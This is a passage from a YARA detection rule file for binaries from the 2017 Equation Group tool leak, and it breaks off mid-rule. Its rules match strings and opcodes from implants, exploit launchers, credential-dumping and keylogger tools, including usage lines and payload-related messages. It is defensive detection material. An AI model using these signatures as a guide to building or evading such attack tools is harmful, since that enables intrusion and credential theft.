fullword ascii $x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii $x4 = "Load and execute implant within the existing thread" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_yak_min_install { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e" strings: $s1 = "driver start" fullword ascii $s2 = "DeviceIoControl Error: %d" fullword ascii $s3 = "Phlook" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetOurAddr { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504" strings: $s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" fullword ascii $s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_GetAdmin_LSADUMP_ModifyPrivilege_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff" hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741" strings: $s1 = "\\system32\\win32k.sys" fullword wide $s2 = "hKeAddSystemServiceTable" fullword ascii $s3 = "hPsDereferencePrimaryToken" fullword ascii $s4 = "CcnFormSyncExFBC" fullword wide $s5 = "hPsDereferencePrimaryToken" fullword ascii $op1 = { 0c 2b 
ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b } $op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 } $op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 } condition: ( uint16(0) == 0x5a4d and filesize < 80KB and ( 4 of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_SendPKTrigger { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26" strings: $x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_DmGz_Target_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904" strings: $s1 = "\\\\.\\%ls" fullword ascii $op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 } $op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 } $op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_mstcp32_DXGHLP16_tdip { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6" hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665" hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29" strings: $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s2 = "\\DosDevices\\%ws" fullword wide $s3 = "\\Device\\%ws_%ws" fullword wide $s4 = "sys\\mstcp32.dbg" fullword ascii $s5 = 
"%ws%03d%ws%wZ" fullword wide $s6 = "TCP/IP driver" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 4 of them ) } rule EquationGroup_Toolset_Apr17_regprobe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de" strings: $x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii $x2 = "key does not exist or pinging w2k system" fullword ascii $x3 = "RpcProxy=255.255.255.255:65536" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af" hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985" hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e" strings: $s1 = ".dllfD" fullword ascii $s2 = "Khsppxu" fullword ascii $s3 = "D$8.exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_GangsterThief_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06" strings: $s1 = "\\\\.\\%s:" fullword wide $s4 = "raw_open CreateFile error" fullword ascii $s5 = "-PATHDELETED-" fullword ascii $s6 = "(deleted)" fullword wide $s8 = "NULLFILENAME" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 3 of them ) } rule 
EquationGroup_Toolset_Apr17_SetCallbackPorts { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0" strings: $s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" fullword ascii $s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_BH_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788" strings: $s2 = "0M1U1Z1p1" fullword ascii /* base64 encoded string '3U5gZu' */ $s14 = "SPRQWV" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_rc5 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb" strings: $s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii $s2 = "where session_key and ciphertext are strings of hex" fullword ascii $s3 = "d = decrypt mode, e = encrypt mode" fullword ascii $s4 = "Bad mode, should be 'd' or 'e'" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_PC_Level_Generic { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = 
"7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a" hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0" hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7" hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c" hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645" hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213" hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76" hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131" hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13" hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16" strings: $s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii $s2 = "\\\\.\\%hs" fullword ascii $s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii $s4 = "Corporation. All rights reserved." fullword wide $s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 } $op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 } $op2 = { c6 44 24 56 64 88 5c 24 57 } $op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f } condition: uint16(0) == 0x5a4d and filesize < 400KB and ( 2 of ($s*) or all of ($op*) ) } rule EquationGroup_Toolset_Apr17_PC_Level3_http_exe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c" strings: $s1 = "Copyright (C) Microsoft" fullword wide $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } $op2 = { 44 24 4e 41 88 5c 24 4f ff } $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_Toolset_Apr17_ParseCapture { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = 
"https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2" strings: $x1 = "* Encrypted log found. An encryption key must be provided" fullword ascii $x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii $x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_ActiveDirectory_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36" strings: $s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide $s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_Legacy_dll { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d" strings: $op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 } $op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 } $op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_svctouch { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b" strings: $s1 = "Causes: 
Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 10KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_pwd_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542" strings: $s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii $op1 = { 40 50 89 44 24 18 FF 15 34 20 00 } condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_KisuComms_Target_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135" strings: $s1 = "363<3S3c3l3q3v3{3" fullword ascii $s2 = "3!3%3)3-3135393@5" fullword ascii /* Recommendation - verify the opcodes on Binarly : http://www.binar.ly */ /* Test each of them in the search field & reduce length until it generates matches */ $op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b } $op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 } $op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( all of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_SlDecoder { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce" strings: $x1 = "Error in conversion. 
SlDecoder.exe <input filename> <output filename> at command line " fullword wide $x2 = "KeyLogger_Data" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Windows_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374" strings: $s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and all of them ) } rule EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0" hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557" hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3" hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e" hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46" strings: $s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii $s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii $s3 = "iijymqp" fullword ascii $s4 = "AWAVAUATASARAQI" fullword ascii $s5 = "WARASATAUAVM" fullword ascii $op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc } $op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 } $op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of ($s*) or all of ($op*) ) } rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_3 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = 
"515374423b8b132258bd91acf6f29168dcc267a3f45ecb9d1fe18ee3a253195b" strings: $a = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $b = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $c = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetCallback { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2" strings: $s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii $s3 = "USAGE: SetCallback <input file> <output file>" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927" hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae" strings: $x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" fullword ascii $x2 = "Double Feature Target Version" fullword ascii $x3 = "DoubleFeature Process ID" fullword ascii $op1 = { a1 30 21 41 00 89 85 d8 fc ff ff a1 34 21 41 00 } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_Toolset_Apr17__vtuner_vtuner_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431" 
hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e" strings: $s1 = "Unable to get -w hash. %x" fullword wide $s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide $s4 = "Unable to set -w provider. %x" fullword wide $op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 } $op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 2 of them ) } rule EquationGroup_Toolset_Apr17__ecwi_ESKE_EVFR_RPC2_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $s1 = "Target is share name" fullword ascii $s2 = "Could not make UdpNetbios header -- bailing" fullword ascii $s3 = "Request non-NT session key" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6" hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd" hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $x1 = "* Listening Post DLL %s() returned error code %d." 
fullword ascii $s1 = "WsaErrorTooManyProcesses" fullword ascii $s2 = "NtErrorMoreProcessingRequired" fullword ascii $s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii $s4 = "ServerErrorBadNamePassword" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of ($s*) or 1 of ($x*) ) } rule EquationGroup_Toolset_Apr17__SendCFTrigger_SendPKTrigger_6 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748" hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26" strings: $s4 = "* Failed to connect to destination - %u" fullword wide $s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__AddResource { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0" hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff" strings: $s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii $s2 = "<PE path> - the path to the PE binary to which to add the resource." fullword ascii $s3 = "Unable to get path for target binary." 
fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 2 of them ) } rule EquationGroup_Toolset_Apr17__ESKE_RPC2_8 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $s4 = "Fragment: Packet too small to contain RPC header" fullword ascii $s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 700KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__LSADUMP_Lp_ModifyPrivilege_Lp_PacketScan_Lp_put_Lp_RemoteExecute_Lp_Windows_Lp_wmi_Lp_9 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194" hash2 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48" hash3 = "2d963529e6db733c5b74db1894d75493507e6e40da0de2f33e301959b50f3d32" hash4 = "e9f6a84899c9a042edbbff391ca076169da1a6f6dfb61b927942fe4be3327749" hash5 = "d989d610b032c72252a2df284d0b53f63f382e305de2a18b453a0510ab6246a3" hash6 = "23d98bca1f6e2f6989d53c2f2adff996ede2c961ea189744f8ae65621003b8b1" hash7 = "d7ae24816fda190feda6a60639cf3716ea00fb63a4bd1069b8ce52d10ad8bc7f" strings: $x1 = "Injection Lib - " wide $x2 = "LSADUMP - - ERROR" wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ETBL_ETRE_10 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = 
"70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" strings: $x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii $x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii $s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef" hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2" hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" strings: $x1 = "Target is vulnerable" fullword ascii $x2 = "Target is NOT vulnerable" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RideArea2_12 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e" strings: $x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii condition: ( 
uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_13 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" strings: $x1 = "Skip call to PackageRideArea(). Payload has already been packaged. Options -x and -q ignored." fullword ascii $s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 600KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__NameProbe_SMBTOUCH_14 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597" hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309" strings: $s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii $s2 = "<\\\\__MSBROWSE__> G" fullword ascii $s3 = "<IRISNAMESERVER>" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f" hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556" hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674" hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337" strings: $x1 = "** SendAndReceive ** - 
